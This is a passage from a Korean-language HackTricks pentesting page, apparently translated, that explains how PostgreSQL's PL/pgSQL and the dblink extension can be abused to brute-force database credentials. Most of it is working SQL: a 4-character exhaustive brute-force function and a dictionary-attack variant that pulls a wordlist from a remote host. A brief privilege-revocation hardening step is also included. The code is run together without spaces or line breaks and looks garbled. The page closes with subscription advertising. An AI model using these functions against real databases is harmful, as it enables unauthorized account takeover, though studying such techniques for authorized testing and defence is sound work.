원본 논문에서 이 공격에 대한 자세한 정보를 찾아보세요](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt).
PL/pgSQL은 SQL의 기능을 확장하여 프로시저 제어를 향상시키는 완전한 기능을 갖춘 프로그래밍 언어입니다. 이는 루프와 다양한 제어 구조의 활용을 포함합니다. PL/pgSQL 언어로 작성된 함수는 SQL 문과 트리거에서 호출될 수 있으며, 데이터베이스 환경 내에서의 작업 범위를 확장합니다.
이 언어를 남용하여 PostgreSQL에게 사용자 자격 증명을 브루트포스하도록 할 수 있지만, 데이터베이스에 존재해야 합니다. 다음을 사용하여 존재 여부를 확인할 수 있습니다:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+---------plpgsql |
기본적으로, 함수 생성은 PUBLIC에게 부여된 권한입니다. 여기서 PUBLIC은 해당 데이터베이스 시스템의 모든 사용자를 의미합니다. 이를 방지하기 위해 관리자는 PUBLIC 도메인에서 USAGE 권한을 취소해야 할 수도 있습니다.
REVOKE ALL PRIVILEGES ONLANGUAGE plpgsql FROM PUBLIC;
그 경우에는, 이전의 쿼리는 다른 결과를 출력할 것입니다:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+-----------------plpgsql | {admin=U/admin}
다음 스크립트가 작동하려면 dblink 함수가 존재해야 합니다. 존재하지 않는 경우 다음과 같이 생성해 볼 수 있습니다.
CREATE EXTENSION dblink;
비밀번호 무차별 대입 공격
다음은 4자리 비밀번호 무차별 대입 공격을 수행하는 방법입니다:
//Create the brute-forcefunctionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$DECLAREword TEXT;BEGINFOR a IN65..122LOOPFOR b IN65..122LOOPFOR c IN65..122LOOPFOR d IN65..122LOOPBEGINword := chr(a) || chr(b) || chr(c) || chr(d);PERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnectionTHEN-- do nothingEND;ENDLOOP;ENDLOOP;ENDLOOP;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql';//Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
참고로, 4자리를 무차별 대입해도 몇 분이 걸릴 수 있습니다.
또한 워드리스트를 다운로드하여 해당 비밀번호만 시도할 수도 있습니다 (사전 공격):
//Create the functionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$BEGINFOR word IN (SELECT word FROM dblink('host=1.2.3.4user=namepassword=qwertydbname=wordlists','SELECT word FROM wordlist')RETURNS (word TEXT)) LOOPBEGINPERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnection THEN-- do nothingEND;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql'-- Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
사이버 보안 회사에서 일하시나요? 회사를 HackTricks에서 광고하고 싶으신가요? 아니면 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? SUBSCRIPTION PLANS를 확인해보세요!